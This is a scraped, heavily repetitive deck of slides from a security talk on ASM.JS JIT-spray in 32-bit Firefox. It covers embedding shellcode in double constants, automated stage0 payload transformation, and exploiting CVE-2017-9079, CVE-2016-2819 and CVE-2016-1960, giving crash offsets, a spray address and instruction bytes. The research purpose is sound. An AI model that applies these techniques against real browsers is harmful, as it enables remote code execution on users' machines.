![Page 62: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/62.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Double values as parameters for FFI
![Page 63: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/63.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Double values as parameters for FFI
emitted code
![Page 64: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/64.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Double values as parameters for FFI
emitted code – double constant values are referenced
![Page 65: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/65.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Double values as parameters for FFI
emitted code – double constant values are referenced
![Page 66: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/66.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Double values as parameters for FFI
emitted code – double constant values are referenced – constants are executable! – constants are continuous in memory! – full constant usable as payload!
– able to inject continuous code!
![Page 67: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/67.jpg)
ASM.JS PayloadsGenerating arbitrary payloads
• Embed attacker instructions in ASM.JS values
• Stage0 which overwrites JIT code with arbitrary shellcode?– Nope: W^X in ASM.JS/Wasm code pages since Firefox 46
• Solution: feature-rich stage0 payload
• Payload should consist of instructions <= 2 (or 3) bytes
![Page 68: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/68.jpg)
ASM.JS PayloadsGenerating arbitrary payloads
• Embed attacker instructions in ASM.JS values
• Stage0 which overwrites JIT code with arbitrary shellcode?– Nope: W^X in ASM.JS/Wasm code pages since Firefox 46
• Solution: feature-rich stage0 payload
• Payload should consist of instructions <= 2 (or 3) bytes
![Page 69: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/69.jpg)
ASM.JS PayloadsAutomated payload generation
• Assembly → machine code → ASM.JS → machine code
• “Comfortably” write your stage0 shellcode in NASM syntax
• Python wrapper assembles it, fxes instructions, branch distances, etc.
• Output: ASM.JS code containing our payload
![Page 70: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/70.jpg)
ASM.JS PayloadsAutomated payload generation
• Problems of automated payload generation:
– x86 instruction size <= 3 bytes (arithmetics) or <= 2 bytes (parameter passing)
– branch target distance, loops?
– side efects of semantic nops?
![Page 71: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/71.jpg)
ASM.JS PayloadsAutomated payload generation
• Some problems solved
– transform MOVs
– preserve fags when needed – loop and branch adjustments
![Page 72: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/72.jpg)
ASM.JS PayloadsAutomated payload generation
• Some problems solved
– transform MOVs
– preserve fags when needed – loop and branch adjustments
![Page 73: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/73.jpg)
ASM.JS PayloadsAutomated payload generation
• Transform MOVs (example)
![Page 74: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/74.jpg)
ASM.JS PayloadsAutomated payload generation
• Transform MOVs (example)
• Instructions <= 2 bytes
→ stage0 compatible
![Page 75: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/75.jpg)
ASM.JS PayloadsAutomated payload generation
• Transform MOVs (example) ASM.JS code
![Page 76: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/76.jpg)
ASM.JS PayloadsAutomated payload generation
• Transform MOVs (example)
![Page 77: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/77.jpg)
ASM.JS PayloadsAutomated payload generation
• Transform MOVs (example)
sprayed ASM.JS payload
![Page 78: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/78.jpg)
ASM.JS PayloadsAutomated payload generation
• Preserve fags when needed - payload we want to insert:
3C 10 CMP AL, 6174 0E JE $+0x10
![Page 79: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/79.jpg)
ASM.JS PayloadsAutomated payload generation
• Preserve fags when needed - payload we want to insert:
- sprayed payload:3C 10 CMP AL, 61A8 05 TEST AL, 0574 0E JE $+0x10
3C 10 CMP AL, 6174 0E JE $+0x10
![Page 80: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/80.jpg)
ASM.JS PayloadsAutomated payload generation
• Preserve fags when needed - payload we want to insert:
- sprayed payload:3C 10 CMP AL, 61A8 05 TEST AL, 0574 0E JE $+0x10
3C 10 CMP AL, 6174 0E JE $+0x10
→ semantic nop kills fags
![Page 81: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/81.jpg)
ASM.JS PayloadsAutomated payload generation
• Preserve fags when needed - payload we want to insert:
- sprayed payload:
- save and restore fags around semantic nop
3C 10 CMP AL, 61A8 05 TEST AL, 0574 0E JE $+0x10
3C 10 CMP AL, 6174 0E JE $+0x10
→ semantic nop kills fags
3C 10 CMP AL, 619C PUSHFD --> save flagsA8 05 TEST AL, 05 --> kills flags9D POPFD --> restore flags74 0E JE $+0x10
![Page 82: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/82.jpg)
2018
// Exploitation //
![Page 83: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/83.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2017-9079
• Appeared in the wild (Tor Browser) • Analysis and bug trigger available in Mozilla Bug report
• Take crashing testcase – fnd a road to EIP to write alternative exploit with ASM.JS JIT-Spray
• Easy… looking into Firefox source code was not even necessary
![Page 84: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/84.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2017-9079
• Firefox 50.0.1 32-bit
– ECX is controlled at xul.dll + 0x7a00dd
(1868.197c): Access violation - code c0000005 (first chance)
mov eax,dword ptr [ecx+0ACh] ds:002b:414141ed=????????
0:000> ?eip-xulEvaluate expression: 7995613 = 007a00dd
![Page 85: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/85.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2017-9079
• Firefox 50.0.1 32-bit
– fnd EIP control after xul.dll + 0x7a00dd → … follow 5 calls and you fnd:
xul + 0x1c0cb8: call dword [eax + 0x138]
![Page 86: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/86.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2017-9079
• Firefox 50.0.1 32-bit
– fnd EIP control after xul.dll + 0x7a00dd → … follow 5 calls and you fnd:
– Exploit: - ASM.JS JIT-Spray to 0x1c1c0054 - Typed Array spray for controlling memory at ECX and EAX - Trigger the bug
xul + 0x1c0cb8: call dword [eax + 0x138]
![Page 87: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/87.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2017-9079
Demo Time
![Page 88: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/88.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2016-2819
• Firefox 46.0.1 32-bit
• “HTML5 parser heap-bufer-overfow”
• Analysis and crashing testcase available in Mozilla Bug Report
• Patched at several vulnerable code paths
![Page 89: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/89.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2016-2819
• Crashing testcase targets difcult to exploit code path:
– bruteforce necessary
• Further analysis based on other patched code paths: – easier to exploit code path available – modifcation of crashing testcase reaches path :-)
![Page 90: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/90.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2016-2819
• Easier-to-exploit code path:
![Page 91: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/91.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2016-2819
• Easier-to-exploit code path:1) integer underfow
1)
![Page 92: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/92.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2016-2819
• Easier-to-exploit code path:1) integer underfow
2) control over node object
1)
2)
![Page 93: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/93.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2016-2819
• Easier-to-exploit code path:1) integer underfow
2) control over node object
3) group is constant → no need to bruteforce
1)
2)
3)
![Page 94: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/94.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2016-2819
• Easier-to-exploit code path:1) integer underfow
2) control over node object
3) group is constant → no need to bruteforce
4) pop() calls node→release() → EIP control
1)
2)
3)
4)
![Page 95: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/95.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2016-2819
Demo Time
![Page 96: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/96.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2016-1960
• Firefox 44.0.2 32-bit
• “Use-after-free in HTML5 string parser”
• Analysis and crashing testcase available in Mozilla Bug Report
• Looks suspiciously similar to CVE-2016-2819
![Page 97: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/97.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2016-1960
• While crashing testcase is diferent from CVE-2016-2819, it exercises same (difcult to exploit) code path. → public exploit uses bruteforce approach
![Page 98: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/98.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2016-1960
• While crashing testcase is diferent from CVE-2016-2819, it exercises same (difcult to exploit) code path. → public exploit uses bruteforce approach
• Let’s try something: modify crashing testcase in same way as for CVE-2016-2819 → works! EIP control and ASM.JS payload execution
![Page 99: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/99.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2016-1960
• While crashing testcase is diferent from CVE-2016-2819, it exercises same (difcult to exploit) code path. → public exploit uses bruteforce approach
• Let’s try something: modify crashing testcase in same way as for CVE-2016-2819 → works! EIP control and ASM.JS payload execution
• Cause: a vulnerable code path was left open...
![Page 100: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/100.jpg)
ASM.JS JIT-Spray ExploitsExploiting CVE-2016-1960
Demo Time
![Page 101: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/101.jpg)
Conclusion• ASM.JS in Firefox was the perfect JIT-Spray target
• Gapless constant pool JIT-Spray on x86
• Generic payload transformation into ASM.JS code
• What about 64-bit Firefox, Chrome and Edge?
• Other RCE mitigations (CFG, ACG, ...) and isolation mechanisms (sandbox, WDAG, ...) not considered.
![Page 102: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/102.jpg)
Thank you!
Questions?